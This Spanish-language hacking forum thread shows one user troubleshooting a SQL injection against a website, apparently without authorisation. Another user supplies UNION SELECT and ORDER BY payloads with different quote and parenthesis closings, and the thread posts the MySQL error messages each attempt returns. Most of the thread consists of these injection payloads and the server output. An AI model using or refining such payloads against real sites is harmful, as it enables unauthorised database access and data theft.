 Autor
|
Tema: Problema al hacer una SQLi (Leído 11,160 veces)
|
Debci
Wiki
 Desconectado
Mensajes: 2.021
Actualizate o muere!
|
Hola muy buenas a todos, probando una SQLi he encontrado lo que parece ser un posible vector de ataque: http://www.mipagina.com/articulo/'1
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1Se supone que asi es vulnerable no? Pero cuando intento hacer la injeción con esto: -1+union+select+1,2,3,n-- (Con n me refiero a que voy subiendo de tablas) Al insertar el -1 se va el error y no aparece ninguna tabla tras probar hasta 20 (no creo que haya mas, sinceramente). Es vulnerable o simplemente no la estoy atacando bien? Saludos |
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 465
|
prueba con
-1') union all select 1,2,3,4,n--
|
|
|
|
|
En línea
|
|
|
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
prueba con
-1') union all select 1,2,3,4,n--
Bad response :/ CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1Gracias por tu ayuda  Saludos
|
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 465
|
es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con ... pueds probar a hacer: -1') union all select 1,2,3,4,'n fijate que la n lleva la comilla antes! en fin, prueba y postea! |
|
|
|
|
En línea
|
|
|
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con ... pueds probar a hacer: -1') union all select 1,2,3,4,'n fijate que la n lleva la comilla antes! en fin, prueba y postea! Mira, si hago esto: -1')+union+all+select+1,2,3,4,'5-- Me devuelve: CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1Sin embargo si pruebo con: -1')+union+all+select+1,2,3,'4,'5-- Da esto: CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5--')' at line 1Por lo que sospecho que las comillas no estan situadas como me parecia :S Saludos
|
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 465
|
vale, prueba con: -1')+union+all+select+1,2,3,4,('5--(fijate en el parentesis) sino, intenta realizar la consulta sin comentar el final de ella |
|
|
|
|
En línea
|
|
|
|
OzX
Desconectado
Mensajes: 406
[NuKe] Team
|
|
|
|
|
|
En línea
|
Undersecurity.net
|
|
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
He conseguido que con eso me devuelva: CMS_GetContentIDByName: Unknown column '87' in 'order clause' Por lo que hay mas tablas de las que sospechaba!ES este codigo el que he usado: -1')+and+1=1+order+by+87+--+ Y con dos comillas suelta esto: CMS_GetContentIDByName: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''') OR (url_rewrite = ''1''') LIMIT 1' at line 1Codigo usado: Saludos
|
|
|
|
« Última modificación: 2 Septiembre 2010, 09:42 am por Debci »
|
En línea
|
|
|
|
|
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
-1+union+select+1,2,3,n; -- Ni siquiera me devuelve un error :S Saludos
|
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Problema con SQLI Helper
Hacking
|
Nardo[N]
|
5
|
6,098
|
24 Febrero 2011, 04:32 am
por Nardo[N]
|
|
|
|
es hacer posible SQLi?
Hacking
|
dArKo2
|
4
|
3,782
|
28 Julio 2011, 21:19 pm
por Ambr0si0
|
|
|
|
como hacer SQLi más rápido??? y las huellas....???
Bugs y Exploits
|
ruben_linux
|
7
|
6,685
|
27 Agosto 2011, 09:52 am
por Gambinoh
|
|
|
|
Problema SQLi real/practico
Nivel Web
|
Søra
|
4
|
4,136
|
23 Septiembre 2011, 23:59 pm
por ~ Yoya ~
|
|
|
|
problema con sql y sqli
« 1 2 »
PHP
|
mxsoun
|
15
|
8,336
|
27 Julio 2017, 02:37 am
por mxsoun
|
 |
